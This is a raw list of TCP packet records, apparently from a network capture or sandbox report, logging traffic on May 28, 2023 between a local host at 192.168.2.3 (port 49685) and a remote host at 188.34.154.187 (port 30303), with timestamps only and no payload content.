May 28, 2023 10:46:23.260627031 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260628939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260648966 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260651112 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260679960 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260695934 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260699987 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260718107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.260745049 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.260771036 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278407097 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278553963 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278573990 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278592110 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278628111 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278630972 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278630972 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278647900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278669119 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278672934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278672934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278672934 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278690100 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278692007 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278708935 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278709888 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278731108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278733969 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278753042 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278759003 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278774023 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278779030 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278819084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278820038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278844118 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278861046 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278886080 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278932095 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.278955936 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.278997898 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279128075 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279148102 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279169083 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279175043 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279190063 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279210091 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279236078 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279278994 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279387951 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279408932 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279428005 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279439926 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279457092 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279469013 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279478073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279491901 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279512882 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279542923 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279580116 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279629946 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279653072 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279702902 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279808998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279858112 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.279968977 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.279998064 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280018091 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280035973 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280044079 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280057907 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280082941 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280122995 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280147076 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280172110 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280282021 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280340910 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280386925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280405998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280426025 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280437946 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280447006 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280452967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280476093 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280483961 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280503988 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280523062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280525923 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280539989 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280545950 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280555964 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280567884 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280579090 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280600071 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280603886 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280616045 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280620098 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280649900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280651093 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280670881 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280689001 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280694008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280703068 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280714035 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280734062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280744076 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280781984 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280800104 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280819893 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.280852079 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.280873060 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283224106 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283242941 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283274889 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283278942 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283303022 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283320904 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283371925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283421993 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283431053 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283442974 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283463001 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283468962 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283485889 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283502102 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283566952 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283587933 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283611059 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283626080 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283648968 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283668041 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283687115 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283691883 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283714056 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283729076 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283729076 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283749104 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283766985 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283777952 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283786058 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283797979 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283818960 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283835888 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283849001 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283890009 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283937931 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283956051 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283974886 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.283982992 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.283994913 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284001112 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284015894 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284024954 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284038067 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284045935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284065008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284070015 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284085989 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284089088 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284104109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284106016 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284126043 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284132004 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284146070 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284153938 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284166098 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284172058 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284194946 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284209013 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284209013 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284229994 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284250021 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284252882 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284292936 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284301996 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284308910 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284351110 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284363031 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284373045 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284396887 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284404039 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284414053 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284424067 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284446955 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284466028 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284478903 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284498930 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284518957 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284523010 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284539938 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284540892 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284563065 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284580946 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284584999 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284603119 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284622908 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284627914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284642935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284647942 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284665108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284667015 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284684896 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284688950 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284713984 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284720898 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284733057 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284765005 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284775019 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284796000 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284816027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284818888 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284837008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284841061 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284883022 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284887075 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284887075 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284925938 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284929037 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284950018 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284970045 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284972906 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.284991980 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.284996986 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285012960 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285032988 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285037041 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285037041 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285054922 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285059929 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285074949 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285078049 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285095930 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285099030 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285120010 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285128117 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285149097 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285149097 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285168886 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285175085 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285188913 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285192966 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285213947 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285231113 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285331011 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285351038 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285371065 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285376072 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285396099 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285401106 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285410881 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285423040 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285443068 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285463095 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285617113 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285636902 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285655022 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285662889 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285675049 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285680056 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285696030 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285700083 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285722017 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285736084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285737991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285756111 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285780907 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285797119 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285813093 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285840034 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285856009 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285868883 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285881042 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285888910 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285907984 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285909891 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285927057 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.285937071 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285959005 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.285972118 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286009073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286051035 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286140919 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286169052 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286184072 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286187887 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286207914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286228895 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286247015 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286266088 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286290884 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286304951 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286329031 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286369085 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286370039 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286407948 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286408901 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286429882 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286449909 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286478996 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286478996 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286490917 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286492109 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286528111 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286535025 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286546946 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286566019 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286571980 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286587000 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286606073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286626101 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286628962 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286644936 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286648989 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286664963 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286665916 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286685944 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286686897 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286710978 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286727905 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286730051 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286770105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286811113 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286849976 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286906004 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286925077 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286943913 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.286950111 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286967993 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.286983967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287014961 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287043095 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287061930 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287086010 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287086964 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287127018 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287134886 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287163973 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287178040 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287203074 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.287218094 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.287236929 CEST	30303	49685	188.34.154.187	192.168.2.3
